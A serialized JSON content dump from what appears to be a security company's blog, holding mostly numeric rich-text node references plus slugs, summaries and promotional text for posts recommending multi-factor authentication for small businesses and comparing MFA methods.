351869,"content":351870,"nodeType":178},{},[351871,351874,351880],{"data":351872,"marks":351873,"value":270793,"nodeType":173},{},[],{"data":351875,"content":351876,"nodeType":186},{"uri":270796},[351877],{"data":351878,"marks":351879,"value":270801,"nodeType":173},{},[],{"data":351881,"marks":351882,"value":270805,"nodeType":173},{},[],{"data":351884,"content":351885,"nodeType":254},{},[351886],{"data":351887,"content":351888,"nodeType":178},{},[351889],{"data":351890,"marks":351891,"value":270815,"nodeType":173},{},[],{"data":351893,"content":351894,"nodeType":178},{},[351895],{"data":351896,"marks":351897,"value":270822,"nodeType":173},{},[],{"data":351899,"content":351900,"nodeType":1653},{},[351901,351949,351997,352045,352093,352141,352189],{"data":351902,"content":351903,"nodeType":1657},{},[351904,351913,351922,351931,351940],{"data":351905,"content":351906,"nodeType":1661},{},[351907],{"data":351908,"content":351909,"nodeType":178},{},[351910],{"data":351911,"marks":351912,"value":270838,"nodeType":173},{},[],{"data":351914,"content":351915,"nodeType":1661},{},[351916],{"data":351917,"content":351918,"nodeType":178},{},[351919],{"data":351920,"marks":351921,"value":270848,"nodeType":173},{},[],{"data":351923,"content":351924,"nodeType":1661},{},[351925],{"data":351926,"content":351927,"nodeType":178},{},[351928],{"data":351929,"marks":351930,"value":266156,"nodeType":173},{},[],{"data":351932,"content":351933,"nodeType":1661},{},[351934],{"data":351935,"content":351936,"nodeType":178},{},[351937],{"data":351938,"marks":351939,"value":270867,"nodeType":173},{},[],{"data":351941,"content":351942,"nodeType":1661},{},[351943],{"data":351944,"content":351945,"nodeType":178},{},[351946],{"data":351947,"marks":351948,"value":270877,"nodeType":173},{},[],{"data":351950,"content":351951,"nodeType":1657},{},[351952,351961,351970,351979,351988],{"data":351953,"content":351954,"nodeType":1687},{},[351955],{"data":351956,"content":351957,"nodeType":178},{},[351958],{"data":351959,"marks":351960,"value":270890,"nodeType":173},{},[],{"data":351962,"content":351963,"nodeType":1687},{},[351964],{"data":351965,"content":351966,"nodeType":178},{},[351967],{"data":351968,"marks":351969,"value":270900,"nodeType":173},{},[],{"data":351971,"content":351972,"nodeType":1687},{},[351973],{"data":351974,"content":351975,"nodeType":178},{},[351976],{"data":351977,"marks":351978,"value":270900,"nodeType":173},{},[],{"data":351980,"content":351981,"nodeType":1687},{},[351982],{"data":351983,"content":351984,"nodeType":178},{},[351985],{"data":351986,"marks":351987,"value":270919,"nodeType":173},{},[],{"data":351989,"content":351990,"nodeType":1687},{},[351991],{"data":351992,"content":351993,"nodeType":178},{},[351994],{"data":351995,"marks":351996,"value":270929,"nodeType":173},{},[],{"data":351998,"content":351999,"nodeType":1657},{},[352000,352009,352018,352027,352036],{"data":352001,"content":352002,"nodeType":1687},{},[352003],{"data":352004,"content":352005,"nodeType":178},{},[352006],{"data":352007,"marks":352008,"value":270942,"nodeType":173},{},[],{"data":352010,"content":352011,"nodeType":1687},{},[352012],{"data":352013,"content":352014,"nodeType":178},{},[352015],{"data":352016,"marks":352017,"value":270952,"nodeType":173},{},[],{"data":352019,"content":352020,"nodeType":1687},{},[352021],{"data":352022,"content":352023,"nodeType":178},{},[352024],{"data":352025,"marks":352026,"value":270900,"nodeType":173},{},[],{"data":352028,"content":352029,"nodeType":1687},{},[352030],{"data":352031,"content":352032,"nodeType":178},{},[352033],{"data":352034,"marks":352035,"value":270919,"nodeType":173},{},[],{"data":352037,"content":352038,"nodeType":1687},{},[352039],{"data":352040,"content":352041,"nodeType":178},{},[352042],{"data":352043,"marks":352044,"value":270929,"nodeType":173},{},[],{"data":352046,"content":352047,"nodeType":1657},{},[352048,352057,352066,352075,352084],{"data":352049,"content":352050,"nodeType":1687},{},[352051],{"data":352052,"content":352053,"nodeType":178},{},[352054],{"data":352055,"marks":352056,"value":270992,"nodeType":173},{},[],{"data":352058,"content":352059,"nodeType":1687},{},[352060],{"data":352061,"content":352062,"nodeType":178},{},[352063],{"data":352064,"marks":352065,"value":271002,"nodeType":173},{},[],{"data":352067,"content":352068,"nodeType":1687},{},[352069],{"data":352070,"content":352071,"nodeType":178},{},[352072],{"data":352073,"marks":352074,"value":271002,"nodeType":173},{},[],{"data":352076,"content":352077,"nodeType":1687},{},[352078],{"data":352079,"content":352080,"nodeType":178},{},[352081],{"data":352082,"marks":352083,"value":271021,"nodeType":173},{},[],{"data":352085,"content":352086,"nodeType":1687},{},[352087],{"data":352088,"content":352089,"nodeType":178},{},[352090],{"data":352091,"marks":352092,"value":271031,"nodeType":173},{},[],{"data":352094,"content":352095,"nodeType":1657},{},[352096,352105,352114,352123,352132],{"data":352097,"content":352098,"nodeType":1687},{},[352099],{"data":352100,"content":352101,"nodeType":178},{},[352102],{"data":352103,"marks":352104,"value":271044,"nodeType":173},{},[],{"data":352106,"content":352107,"nodeType":1687},{},[352108],{"data":352109,"content":352110,"nodeType":178},{},[352111],{"data":352112,"marks":352113,"value":271002,"nodeType":173},{},[],{"data":352115,"content":352116,"nodeType":1687},{},[352117],{"data":352118,"content":352119,"nodeType":178},{},[352120],{"data":352121,"marks":352122,"value":271002,"nodeType":173},{},[],{"data":352124,"content":352125,"nodeType":1687},{},[352126],{"data":352127,"content":352128,"nodeType":178},{},[352129],{"data":352130,"marks":352131,"value":270919,"nodeType":173},{},[],{"data":352133,"content":352134,"nodeType":1687},{},[352135],{"data":352136,"content":352137,"nodeType":178},{},[352138],{"data":352139,"marks":352140,"value":271031,"nodeType":173},{},[],{"data":352142,"content":352143,"nodeType":1657},{},[352144,352153,352162,352171,352180],{"data":352145,"content":352146,"nodeType":1687},{},[352147],{"data":352148,"content":352149,"nodeType":178},{},[352150],{"data":352151,"marks":352152,"value":271093,"nodeType":173},{},[],{"data":352154,"content":352155,"nodeType":1687},{},[352156],{"data":352157,"content":352158,"nodeType":178},{},[352159],{"data":352160,"marks":352161,"value":271103,"nodeType":173},{},[],{"data":352163,"content":352164,"nodeType":1687},{},[352165],{"data":352166,"content":352167,"nodeType":178},{},[352168],{"data":352169,"marks":352170,"value":271103,"nodeType":173},{},[],{"data":352172,"content":352173,"nodeType":1687},{},[352174],{"data":352175,"content":352176,"nodeType":178},{},[352177],{"data":352178,"marks":352179,"value":271122,"nodeType":173},{},[],{"data":352181,"content":352182,"nodeType":1687},{},[352183],{"data":352184,"content":352185,"nodeType":178},{},[352186],{"data":352187,"marks":352188,"value":270929,"nodeType":173},{},[],{"data":352190,"content":352191,"nodeType":1657},{},[352192,352201,352210,352219,352228],{"data":352193,"content":352194,"nodeType":1687},{},[352195],{"data":352196,"content":352197,"nodeType":178},{},[352198],{"data":352199,"marks":352200,"value":271144,"nodeType":173},{},[],{"data":352202,"content":352203,"nodeType":1687},{},[352204],{"data":352205,"content":352206,"nodeType":178},{},[352207],{"data":352208,"marks":352209,"value":271103,"nodeType":173},{},[],{"data":352211,"content":352212,"nodeType":1687},{},[352213],{"data":352214,"content":352215,"nodeType":178},{},[352216],{"data":352217,"marks":352218,"value":271103,"nodeType":173},{},[],{"data":352220,"content":352221,"nodeType":1687},{},[352222],{"data":352223,"content":352224,"nodeType":178},{},[352225],{"data":352226,"marks":352227,"value":271122,"nodeType":173},{},[],{"data":352229,"content":352230,"nodeType":1687},{},[352231],{"data":352232,"content":352233,"nodeType":178},{},[352234],{"data":352235,"marks":352236,"value":270929,"nodeType":173},{},[],{"data":352238,"content":352241,"nodeType":312},{"target":352239},{"sys":352240},{"id":271185,"type":317,"linkType":318},[],{"data":352243,"content":352244,"nodeType":235},{},[352245],{"data":352246,"marks":352247,"value":270890,"nodeType":173},{},[],{"data":352249,"content":352250,"nodeType":178},{},[352251],{"data":352252,"marks":352253,"value":271199,"nodeType":173},{},[],{"data":352255,"content":352256,"nodeType":178},{},[352257],{"data":352258,"marks":352259,"value":271206,"nodeType":173},{},[],{"data":352261,"content":352262,"nodeType":178},{},[352263],{"data":352264,"marks":352265,"value":271213,"nodeType":173},{},[],{"data":352267,"content":352270,"nodeType":312},{"target":352268},{"sys":352269},{"id":271218,"type":317,"linkType":318},[],{"data":352272,"content":352273,"nodeType":235},{},[352274],{"data":352275,"marks":352276,"value":271226,"nodeType":173},{},[],{"data":352278,"content":352279,"nodeType":178},{},[352280],{"data":352281,"marks":352282,"value":271233,"nodeType":173},{},[],{"data":352284,"content":352285,"nodeType":178},{},[352286],{"data":352287,"marks":352288,"value":271240,"nodeType":173},{},[],{"data":352290,"content":352291,"nodeType":178},{},[352292],{"data":352293,"marks":352294,"value":271247,"nodeType":173},{},[],{"data":352296,"content":352297,"nodeType":178},{},[352298],{"data":352299,"marks":352300,"value":271254,"nodeType":173},{},[],{"data":352302,"content":352303,"nodeType":178},{},[352304],{"data":352305,"marks":352306,"value":271261,"nodeType":173},{},[],{"data":352308,"content":352309,"nodeType":235},{},[352310],{"data":352311,"marks":352312,"value":271268,"nodeType":173},{},[],{"data":352314,"content":352315,"nodeType":178},{},[352316],{"data":352317,"marks":352318,"value":271275,"nodeType":173},{},[],{"data":352320,"content":352321,"nodeType":178},{},[352322,352325,352331],{"data":352323,"marks":352324,"value":271282,"nodeType":173},{},[],{"data":352326,"content":352327,"nodeType":186},{"uri":271285},[352328],{"data":352329,"marks":352330,"value":271290,"nodeType":173},{},[],{"data":352332,"marks":352333,"value":271294,"nodeType":173},{},[],{"data":352335,"content":352336,"nodeType":178},{},[352337],{"data":352338,"marks":352339,"value":271301,"nodeType":173},{},[],{"data":352341,"content":352342,"nodeType":178},{},[352343],{"data":352344,"marks":352345,"value":271308,"nodeType":173},{},[],{"data":352347,"content":352348,"nodeType":178},{},[352349],{"data":352350,"marks":352351,"value":271315,"nodeType":173},{},[],{"data":352353,"content":352354,"nodeType":235},{},[352355],{"data":352356,"marks":352357,"value":271322,"nodeType":173},{},[],{"data":352359,"content":352360,"nodeType":178},{},[352361],{"data":352362,"marks":352363,"value":271329,"nodeType":173},{},[],{"data":352365,"content":352366,"nodeType":178},{},[352367,352370,352376,352379,352385],{"data":352368,"marks":352369,"value":271336,"nodeType":173},{},[],{"data":352371,"content":352372,"nodeType":186},{"uri":271339},[352373],{"data":352374,"marks":352375,"value":271344,"nodeType":173},{},[],{"data":352377,"marks":352378,"value":271348,"nodeType":173},{},[],{"data":352380,"content":352381,"nodeType":186},{"uri":270796},[352382],{"data":352383,"marks":352384,"value":271355,"nodeType":173},{},[],{"data":352386,"marks":352387,"value":271359,"nodeType":173},{},[],{"data":352389,"content":352390,"nodeType":178},{},[352391],{"data":352392,"marks":352393,"value":271366,"nodeType":173},{},[],{"data":352395,"content":352396,"nodeType":178},{},[352397],{"data":352398,"marks":352399,"value":271373,"nodeType":173},{},[],{"data":352401,"content":352402,"nodeType":178},{},[352403],{"data":352404,"marks":352405,"value":271380,"nodeType":173},{},[],{"data":352407,"content":352408,"nodeType":235},{},[352409],{"data":352410,"marks":352411,"value":271387,"nodeType":173},{},[],{"data":352413,"content":352414,"nodeType":178},{},[352415],{"data":352416,"marks":352417,"value":271394,"nodeType":173},{},[],{"data":352419,"content":352420,"nodeType":178},{},[352421],{"data":352422,"marks":352423,"value":271401,"nodeType":173},{},[],{"data":352425,"content":352426,"nodeType":231},{},[],{"data":352428,"content":352429,"nodeType":178},{},[352430],{"data":352431,"marks":352432,"value":271411,"nodeType":173},{},[],{"data":352434,"content":352437,"nodeType":312},{"target":352435},{"sys":352436},{"id":209109,"type":317,"linkType":318},[],{"data":352439,"content":352440,"nodeType":178},{},[352441],{"data":352442,"marks":352443,"value":37,"nodeType":173},{},[],[182376],{"items":352446},[352447,352449],{"sys":352448,"name":26133},{"id":26132},{"sys":352450,"name":26137},{"id":26136},{"items":352452},[352453],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":352454},{"url":19129},{"items":352456},[352457],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":352458},{"url":19129},"content:blog:how-to-set-up-multi-factor-authentication-for-microsoft-365.json","blog/how-to-set-up-multi-factor-authentication-for-microsoft-365.json","blog/how-to-set-up-multi-factor-authentication-for-microsoft-365",{"_path":352463,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":352464,"ogImage":118,"summary":352466,"relatedBlogPostsCollection":352477,"title":298867,"subtitle":118,"metaTitle":352479,"synopsis":344671,"hashTags":352480,"publishedDate":271426,"slug":298868,"tagsCollection":352481,"authorsCollection":352487,"content":352491,"_id":352869,"_type":5439,"_source":5440,"_file":352870,"_stem":352871,"_extension":5439},"/blog/multi-factor-authentication-is-the-top-security-control-for-most-small-and",{"id":283809,"publishedAt":352465},"2024-03-21T09:29:47.038Z",{"json":352467},{"data":352468,"content":352469,"nodeType":165},{},[352470],{"data":352471,"content":352472,"nodeType":178},{},[352473],{"data":352474,"marks":352475,"value":352476,"nodeType":173},{},[],"MFA prevents the most common attacks against small and medium-sized businesses. Most big cloud providers support MFA, and are pushing adoption because they know it works. Done well, MFA may even improve the user experience! Start rolling out MFA first on cloud services for the best bang-for-buck.",{"items":352478},[],"Multi-Factor Authentication is the top security control SMEs",[182376,344673],{"items":352482},[352483,352485],{"sys":352484,"name":26133},{"id":26132},{"sys":352486,"name":26137},{"id":26136},{"items":352488},[352489],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":352490},{"url":13981},{"json":352492,"links":352840},{"data":352493,"content":352494,"nodeType":165},{},[352495,352501,352507,352512,352518,352524,352530,352644,352649,352655,352661,352667,352673,352679,352685,352691,352697,352703,352709,352725,352731,352737,352825],{"data":352496,"content":352497,"nodeType":178},{},[352498],{"data":352499,"marks":352500,"value":344278,"nodeType":173},{},[],{"data":352502,"content":352503,"nodeType":178},{},[352504],{"data":352505,"marks":352506,"value":37,"nodeType":173},{},[],{"data":352508,"content":352511,"nodeType":312},{"target":352509},{"sys":352510},{"id":344289,"type":317,"linkType":318},[],{"data":352513,"content":352514,"nodeType":178},{},[352515],{"data":352516,"marks":352517,"value":37,"nodeType":173},{},[],{"data":352519,"content":352520,"nodeType":169},{},[352521],{"data":352522,"marks":352523,"value":344303,"nodeType":173},{},[],{"data":352525,"content":352526,"nodeType":178},{},[352527],{"data":352528,"marks":352529,"value":344310,"nodeType":173},{},[],{"data":352531,"content":352532,"nodeType":250},{},[352533,352556,352579,352602,352625],{"data":352534,"content":352535,"nodeType":254},{},[352536],{"data":352537,"content":352538,"nodeType":178},{},[352539,352543,352546,352553],{"data":352540,"marks":352541,"value":1255,"nodeType":173},{},[352542],{"type":370},{"data":352544,"marks":352545,"value":344327,"nodeType":173},{},[],{"data":352547,"content":352548,"nodeType":186},{"uri":344330},[352549],{"data":352550,"marks":352551,"value":344336,"nodeType":173},{},[352552],{"type":194},{"data":352554,"marks":352555,"value":344340,"nodeType":173},{},[],{"data":352557,"content":352558,"nodeType":254},{},[352559],{"data":352560,"content":352561,"nodeType":178},{},[352562,352566,352569,352576],{"data":352563,"marks":352564,"value":211236,"nodeType":173},{},[352565],{"type":370},{"data":352567,"marks":352568,"value":344354,"nodeType":173},{},[],{"data":352570,"content":352571,"nodeType":186},{"uri":344357},[352572],{"data":352573,"marks":352574,"value":344363,"nodeType":173},{},[352575],{"type":194},{"data":352577,"marks":352578,"value":37,"nodeType":173},{},[],{"data":352580,"content":352581,"nodeType":254},{},[352582],{"data":352583,"content":352584,"nodeType":178},{},[352585,352589,352592,352599],{"data":352586,"marks":352587,"value":96495,"nodeType":173},{},[352588],{"type":370},{"data":352590,"marks":352591,"value":344380,"nodeType":173},{},[],{"data":352593,"content":352594,"nodeType":186},{"uri":344383},[352595],{"data":352596,"marks":352597,"value":344389,"nodeType":173},{},[352598],{"type":194},{"data":352600,"marks":352601,"value":10557,"nodeType":173},{},[],{"data":352603,"content":352604,"nodeType":254},{},[352605],{"data":352606,"content":352607,"nodeType":178},{},[352608,352612,352615,352622],{"data":352609,"marks":352610,"value":344403,"nodeType":173},{},[352611],{"type":370},{"data":352613,"marks":352614,"value":344407,"nodeType":173},{},[],{"data":352616,"content":352617,"nodeType":186},{"uri":344410},[352618],{"data":352619,"marks":352620,"value":344416,"nodeType":173},{},[352621],{"type":194},{"data":352623,"marks":352624,"value":10557,"nodeType":173},{},[],{"data":352626,"content":352627,"nodeType":254},{},[352628],{"data":352629,"content":352630,"nodeType":178},{},[352631,352634,352641],{"data":352632,"marks":352633,"value":344429,"nodeType":173},{},[],{"data":352635,"content":352636,"nodeType":186},{"uri":344432},[352637],{"data":352638,"marks":352639,"value":344438,"nodeType":173},{},[352640],{"type":194},{"data":352642,"marks":352643,"value":10557,"nodeType":173},{},[],{"data":352645,"content":352648,"nodeType":312},{"target":352646},{"sys":352647},{"id":344446,"type":317,"linkType":318},[],{"data":352650,"content":352651,"nodeType":178},{},[352652],{"data":352653,"marks":352654,"value":37,"nodeType":173},{},[],{"data":352656,"content":352657,"nodeType":169},{},[352658],{"data":352659,"marks":352660,"value":344460,"nodeType":173},{},[],{"data":352662,"content":352663,"nodeType":178},{},[352664],{"data":352665,"marks":352666,"value":344467,"nodeType":173},{},[],{"data":352668,"content":352669,"nodeType":178},{},[352670],{"data":352671,"marks":352672,"value":344474,"nodeType":173},{},[],{"data":352674,"content":352675,"nodeType":178},{},[352676],{"data":352677,"marks":352678,"value":344481,"nodeType":173},{},[],{"data":352680,"content":352681,"nodeType":169},{},[352682],{"data":352683,"marks":352684,"value":344488,"nodeType":173},{},[],{"data":352686,"content":352687,"nodeType":178},{},[352688],{"data":352689,"marks":352690,"value":344495,"nodeType":173},{},[],{"data":352692,"content":352693,"nodeType":169},{},[352694],{"data":352695,"marks":352696,"value":344502,"nodeType":173},{},[],{"data":352698,"content":352699,"nodeType":178},{},[352700],{"data":352701,"marks":352702,"value":344509,"nodeType":173},{},[],{"data":352704,"content":352705,"nodeType":178},{},[352706],{"data":352707,"marks":352708,"value":344516,"nodeType":173},{},[],{"data":352710,"content":352711,"nodeType":178},{},[352712,352715,352722],{"data":352713,"marks":352714,"value":344523,"nodeType":173},{},[],{"data":352716,"content":352717,"nodeType":186},{"uri":344526},[352718],{"data":352719,"marks":352720,"value":344532,"nodeType":173},{},[352721],{"type":194},{"data":352723,"marks":352724,"value":344536,"nodeType":173},{},[],{"data":352726,"content":352727,"nodeType":169},{},[352728],{"data":352729,"marks":352730,"value":344543,"nodeType":173},{},[],{"data":352732,"content":352733,"nodeType":178},{},[352734],{"data":352735,"marks":352736,"value":344550,"nodeType":173},{},[],{"data":352738,"content":352739,"nodeType":250},{},[352740,352762,352775,352799,352812],{"data":352741,"content":352742,"nodeType":254},{},[352743],{"data":352744,"content":352745,"nodeType":178},{},[352746,352750,352753,352759],{"data":352747,"marks":352748,"value":344564,"nodeType":173},{},[352749],{"type":370},{"data":352751,"marks":352752,"value":344568,"nodeType":173},{},[],{"data":352754,"content":352755,"nodeType":186},{"uri":344571},[352756],{"data":352757,"marks":352758,"value":344576,"nodeType":173},{},[],{"data":352760,"marks":352761,"value":344580,"nodeType":173},{},[],{"data":352763,"content":352764,"nodeType":254},{},[352765],{"data":352766,"content":352767,"nodeType":178},{},[352768,352772],{"data":352769,"marks":352770,"value":344591,"nodeType":173},{},[352771],{"type":370},{"data":352773,"marks":352774,"value":344595,"nodeType":173},{},[],{"data":352776,"content":352777,"nodeType":254},{},[352778],{"data":352779,"content":352780,"nodeType":178},{},[352781,352785,352788,352796],{"data":352782,"marks":352783,"value":344606,"nodeType":173},{},[352784],{"type":370},{"data":352786,"marks":352787,"value":344610,"nodeType":173},{},[],{"data":352789,"content":352792,"nodeType":1698},{"target":352790},{"sys":352791},{"id":270693,"type":317,"linkType":318},[352793],{"data":352794,"marks":352795,"value":344619,"nodeType":173},{},[],{"data":352797,"marks":352798,"value":344623,"nodeType":173},{},[],{"data":352800,"content":352801,"nodeType":254},{},[352802],{"data":352803,"content":352804,"nodeType":178},{},[352805,352809],{"data":352806,"marks":352807,"value":344634,"nodeType":173},{},[352808],{"type":370},{"data":352810,"marks":352811,"value":344638,"nodeType":173},{},[],{"data":352813,"content":352814,"nodeType":254},{},[352815],{"data":352816,"content":352817,"nodeType":178},{},[352818,352822],{"data":352819,"marks":352820,"value":344649,"nodeType":173},{},[352821],{"type":370},{"data":352823,"marks":352824,"value":344653,"nodeType":173},{},[],{"data":352826,"content":352827,"nodeType":178},{},[352828,352831,352837],{"data":352829,"marks":352830,"value":344660,"nodeType":173},{},[],{"data":352832,"content":352833,"nodeType":186},{"uri":332237},[352834],{"data":352835,"marks":352836,"value":92946,"nodeType":173},{},[],{"data":352838,"marks":352839,"value":344670,"nodeType":173},{},[],{"entries":352841},{"inline":352842,"hyperlink":352843,"block":352846},[],[352844],{"sys":352845,"__typename":1528,"title":271423,"slug":271427},{"id":270693},[352847,352854],{"sys":352848,"__typename":5345,"title":352849,"caption":118,"layoutMode":112585,"file":352850},{"id":344289},"MFA Banner",{"url":352851,"width":352852,"height":352853},"https://images.ctfassets.net/y1cdw1ablpvd/BXUoKdU4q4YI5NjKOngVF/7288d864bcf774fadd2668636c0b66b8/mfa.svg",1030,366,{"sys":352855,"__typename":335449,"content":352856,"title":352867,"buttonText":18605,"buttonUrl":352868,"signupRedirectUrl":118},{"id":344446},{"json":352857},{"data":352858,"content":352859,"nodeType":165},{},[352860],{"data":352861,"content":352862,"nodeType":178},{},[352863],{"data":352864,"marks":352865,"value":352866,"nodeType":173},{},[],"The first step of our MFA adoption initiative will allow you to see which users on your cloud platforms are currently protected by MFA. The rest of the initiative makes that number go up.","We can help you see where MFA is rolled out","/features/adopt-multi-factor-authentication/","content:blog:multi-factor-authentication-is-the-top-security-control-for-most-small-and.json","blog/multi-factor-authentication-is-the-top-security-control-for-most-small-and.json","blog/multi-factor-authentication-is-the-top-security-control-for-most-small-and",{"_path":352873,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":352874,"ogImage":118,"summary":352876,"relatedBlogPostsCollection":352887,"title":271423,"subtitle":118,"metaTitle":352889,"synopsis":271424,"hashTags":352890,"publishedDate":271426,"slug":271427,"tagsCollection":352891,"content":352897,"authorsCollection":353603,"_id":353607,"_type":5439,"_source":5440,"_file":353608,"_stem":353609,"_extension":5439},"/blog/which-mfa-methods-should-you-use",{"id":270693,"publishedAt":352875},"2024-03-21T09:30:18.550Z",{"json":352877},{"data":352878,"content":352879,"nodeType":165},{},[352880],{"data":352881,"content":352882,"nodeType":178},{},[352883],{"data":352884,"marks":352885,"value":352886,"nodeType":173},{},[],"We all know Multi-Factor Authentication (MFA) is a good idea but how important is the \"factor\" you choose? From the classic SMS to the modern Yubikey, and everything in-between, we've got you covered when it comes to MFA methods.",{"items":352888},[],"The most secure multi-factor authentication methods",[182376],{"items":352892},[352893,352895],{"sys":352894,"name":26133},{"id":26132},{"sys":352896,"name":26137},{"id":26136},{"json":352898,"links":353556},{"data":352899,"content":352900,"nodeType":165},{},[352901,352914,352920,352959,352965,353004,353010,353349,353354,353360,353366,353372,353378,353383,353389,353395,353401,353407,353413,353419,353425,353431,353446,353452,353458,353464,353470,353476,353500,353506,353512,353518,353524,353530,353536,353539,353545,353550],{"data":352902,"content":352903,"nodeType":178},{},[352904,352907,352911],{"data":352905,"marks":352906,"value":270704,"nodeType":173},{},[],{"data":352908,"marks":352909,"value":270709,"nodeType":173},{},[352910],{"type":370},{"data":352912,"marks":352913,"value":270713,"nodeType":173},{},[],{"data":352915,"content":352916,"nodeType":178},{},[352917],{"data":352918,"marks":352919,"value":270720,"nodeType":173},{},[],{"data":352921,"content":352922,"nodeType":250},{},[352923,352932,352941,352950],{"data":352924,"content":352925,"nodeType":254},{},[352926],{"data":352927,"content":352928,"nodeType":178},{},[352929],{"data":352930,"marks":352931,"value":270733,"nodeType":173},{},[],{"data":352933,"content":352934,"nodeType":254},{},[352935],{"data":352936,"content":352937,"nodeType":178},{},[352938],{"data":352939,"marks":352940,"value":270743,"nodeType":173},{},[],{"data":352942,"content":352943,"nodeType":254},{},[352944],{"data":352945,"content":352946,"nodeType":178},{},[352947],{"data":352948,"marks":352949,"value":270753,"nodeType":173},{},[],{"data":352951,"content":352952,"nodeType":254},{},[352953],{"data":352954,"content":352955,"nodeType":178},{},[352956],{"data":352957,"marks":352958,"value":270763,"nodeType":173},{},[],{"data":352960,"content":352961,"nodeType":235},{},[352962],{"data":352963,"marks":352964,"value":270770,"nodeType":173},{},[],{"data":352966,"content":352967,"nodeType":250},{},[352968,352977,352995],{"data":352969,"content":352970,"nodeType":254},{},[352971],{"data":352972,"content":352973,"nodeType":178},{},[352974],{"data":352975,"marks":352976,"value":270783,"nodeType":173},{},[],{"data":352978,"content":352979,"nodeType":254},{},[352980],{"data":352981,"content":352982,"nodeType":178},{},[352983,352986,352992],{"data":352984,"marks":352985,"value":270793,"nodeType":173},{},[],{"data":352987,"content":352988,"nodeType":186},{"uri":270796},[352989],{"data":352990,"marks":352991,"value":270801,"nodeType":173},{},[],{"data":352993,"marks":352994,"value":270805,"nodeType":173},{},[],{"data":352996,"content":352997,"nodeType":254},{},[352998],{"data":352999,"content":353000,"nodeType":178},{},[353001],{"data":353002,"marks":353003,"value":270815,"nodeType":173},{},[],{"data":353005,"content":353006,"nodeType":178},{},[353007],{"data":353008,"marks":353009,"value":270822,"nodeType":173},{},[],{"data":353011,"content":353012,"nodeType":1653},{},[353013,353061,353109,353157,353205,353253,353301],{"data":353014,"content":353015,"nodeType":1657},{},[353016,353025,353034,353043,353052],{"data":353017,"content":353018,"nodeType":1661},{},[353019],{"data":353020,"content":353021,"nodeType":178},{},[353022],{"data":353023,"marks":353024,"value":270838,"nodeType":173},{},[],{"data":353026,"content":353027,"nodeType":1661},{},[353028],{"data":353029,"content":353030,"nodeType":178},{},[353031],{"data":353032,"marks":353033,"value":270848,"nodeType":173},{},[],{"data":353035,"content":353036,"nodeType":1661},{},[353037],{"data":353038,"content":353039,"nodeType":178},{},[353040],{"data":353041,"marks":353042,"value":266156,"nodeType":173},{},[],{"data":353044,"content":353045,"nodeType":1661},{},[353046],{"data":353047,"content":353048,"nodeType":178},{},[353049],{"data":353050,"marks":353051,"value":270867,"nodeType":173},{},[],{"data":353053,"content":353054,"nodeType":1661},{},[353055],{"data":353056,"content":353057,"nodeType":178},{},[353058],{"data":353059,"marks":353060,"value":270877,"nodeType":173},{},[],{"data":353062,"content":353063,"nodeType":1657},{},[353064,353073,353082,353091,353100],{"data":353065,"content":353066,"nodeType":1687},{},[353067],{"data":353068,"content":353069,"nodeType":178},{},[353070],{"data":353071,"marks":353072,"value":270890,"nodeType":173},{},[],{"data":353074,"content":353075,"nodeType":1687},{},[353076],{"data":353077,"content":353078,"nodeType":178},{},[353079],{"data":353080,"marks":353081,"value":270900,"nodeType":173},{},[],{"data":353083,"content":353084,"nodeType":1687},{},[353085],{"data":353086,"content":353087,"nodeType":178},{},[353088],{"data":353089,"marks":353090,"value":270900,"nodeType":173},{},[],{"data":353092,"content":353093,"nodeType":1687},{},[353094],{"data":353095,"content":353096,"nodeType":178},{},[353097],{"data":353098,"marks":353099,"value":270919,"nodeType":173},{},[],{"data":353101,"content":353102,"nodeType":1687},{},[353103],{"data":353104,"content":353105,"nodeType":178},{},[353106],{"data":353107,"marks":353108,"value":270929,"nodeType":173},{},[],{"data":353110,"content":353111,"nodeType":1657},{},[353112,353121,353130,353139,353148],{"data":353113,"content":353114,"nodeType":1687},{},[353115],{"data":353116,"content":353117,"nodeType":178},{},[353118],{"data":353119,"marks":353120,"value":270942,"nodeType":173},{},[],{"data":353122,"content":353123,"nodeType":1687},{},[353124],{"data":353125,"content":353126,"nodeType":178},{},[353127],{"data":353128,"marks":353129,"value":270952,"nodeType":173},{},[],{"data":353131,"content":353132,"nodeType":1687},{},[353133],{"data":353134,"content":353135,"nodeType":178},{},[353136],{"data":353137,"marks":353138,"value":270900,"nodeType":173},{},[],{"data":353140,"content":353141,"nodeType":1687},{},[353142],{"data":353143,"content":353144,"nodeType":178},{},[353145],{"data":353146,"marks":353147,"value":270919,"nodeType":173},{},[],{"data":353149,"content":353150,"nodeType":1687},{},[353151],{"data":353152,"content":353153,"nodeType":178},{},[353154],{"data":353155,"marks":353156,"value":270929,"nodeType":173},{},[],{"data":353158,"content":353159,"nodeType":1657},{},[353160,353169,353178,353187,353196],{"data":353161,"content":353162,"nodeType":1687},{},[353163],{"data":353164,"content":353165,"nodeType":178},{},[353166],{"data":353167,"marks":353168,"value":270992,"nodeType":173},{},[],{"data":353170,"content":353171,"nodeType":1687},{},[353172],{"data":353173,"content":353174,"nodeType":178},{},[353175],{"data":353176,"marks":353177,"value":271002,"nodeType":173},{},[],{"data":353179,"content":353180,"nodeType":1687},{},[353181],{"data":353182,"content":353183,"nodeType":178},{},[353184],{"data":353185,"marks":353186,"value":271002,"nodeType":173},{},[],{"data":353188,"content":353189,"nodeType":1687},{},[353190],{"data":353191,"content":353192,"nodeType":178},{},[353193],{"data":353194,"marks":353195,"value":271021,"nodeType":173},{},[],{"data":353197,"content":353198,"nodeType":1687},{},[353199],{"data":353200,"content":353201,"nodeType":178},{},[353202],{"data":353203,"marks":353204,"value":271031,"nodeType":173},{},[],{"data":353206,"content":353207,"nodeType":1657},{},[353208,353217,353226,353235,353244],{"data":353209,"content":353210,"nodeType":1687},{},[353211],{"data":353212,"content":353213,"nodeType":178},{},[353214],{"data":353215,"marks":353216,"value":271044,"nodeType":173},{},[],{"data":353218,"content":353219,"nodeType":1687},{},[353220],{"data":353221,"content":353222,"nodeType":178},{},[353223],{"data":353224,"marks":353225,"value":271002,"nodeType":173},{},[],{"data":353227,"content":353228,"nodeType":1687},{},[353229],{"data":353230,"content":353231,"nodeType":178},{},[353232],{"data":353233,"marks":353234,"value":271002,"nodeType":173},{},[],{"data":353236,"content":353237,"nodeType":1687},{},[353238],{"data":353239,"content":353240,"nodeType":178},{},[353241],{"data":353242,"marks":353243,"value":270919,"nodeType":173},{},[],{"d